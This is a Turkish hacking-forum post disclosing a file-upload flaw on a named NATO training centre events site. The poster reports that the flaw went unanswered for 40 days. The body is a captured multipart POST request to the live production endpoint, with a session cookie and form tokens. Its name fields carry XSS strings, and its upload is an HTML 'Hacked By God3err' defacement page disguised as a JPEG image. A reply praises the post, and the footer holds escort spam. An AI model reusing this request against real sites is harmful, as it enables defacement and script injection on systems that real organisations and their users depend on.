NATO Training Center Upload Vulnerability //God3err

God3err

God3err

Spys-Z
Katılım
5 Ağu 2015
Mesajlar
334
Tepkime puanı
0
Puanları
0
Yaş
58
Gerekli yerlere bildirilmiş ancak 40 gün yanıt alınamamıştır !

[hide]
[font=Verdana, Arial, Helvetica, sans-serif][font=Monaco, monospace, Courier]NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Videos :
----------------------------------------------------------------
Vulnerable POST Code :
----------------------------------------------------------------
17:28:39.016
[4438ms]
[total 4438ms]
Status: 200[OK]

POST https://events.jftc.nato.int/user/2...ormat=drupal_ajax&_wrapper_format=drupal_ajax
Load Flags[LOAD_BACKGROUND  LOAD_BYPASS_LOCAL_CACHE  ]
Content Size[-1]
Mime Type[application/json]
 
Request Headers:
     
Host[events.jftc.nato.int]
     
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
     
Accept[application/json, text/javascript, */*; q=0.01]
     
Accept-Language[en-US,en;q=0.5]
     
Accept-Encoding[gzip, deflate, br]
     
X-Requested-With[XMLHttpRequest]
     
Referer[https://events.jftc.nato.int/user/26426/userdata]
     
Content-Length[7132]
     
Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
     
Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
     
Connection[keep-alive]
 
Post Data:

   
POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"


-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"

F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"

OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"

TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"

ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"

Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"

1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"

NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"

1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"


-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"

05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"

safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg

<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"


-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"

6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"

168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"

Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"

married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"

1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"

burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"

Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"

form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"

AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"

simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"

user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"

Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"

1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"

bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"


-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"

autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]
  Response Headers:
     Server[nginx]
     Date[Tue, 08 May 2018 14:28:43 GMT]
     Content-Type[application/json]
     Cache-Control[must-revalidate, no-cache, private]
     x-ua-compatible[IE=edge]
     Content-Language[en]
     X-Content-Type-Options[nosniff]
     X-Frame-Options[SAMEORIGIN]
     Expires[Sun, 19 Nov 1978 05:00:00 GMT]
     Vary[Accept-Encoding]
     x-generator[Drupal 8 (https://www.drupal.org)]
     x-drupal-ajax-token[1]
     Content-Encoding[gzip]
     x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
     x-ah-environment[prod]
     x-varnish[713984183]
     Age[0]
     via[1.1 varnish-v4]
     X-Cache[MISS]
     Accept-Ranges[bytes]
     X-Firefox-Spdy[h2]
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------[/font]

[/font][/hide]
 
D

dork

Spys-Z
Katılım
14 Eyl 2013
Mesajlar
263
Tepkime puanı
0
Puanları
0
Eline sağlık kardeşim sağolasın
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort bodrum escort alanya escort kayseri escort konya escort marmaris escort bodrum escort tto dermodicos vozol puff sakarya escort sakarya escort bayan serdivan escort adapazarı escort
Üst
Copyright® Ajanlar.org 2012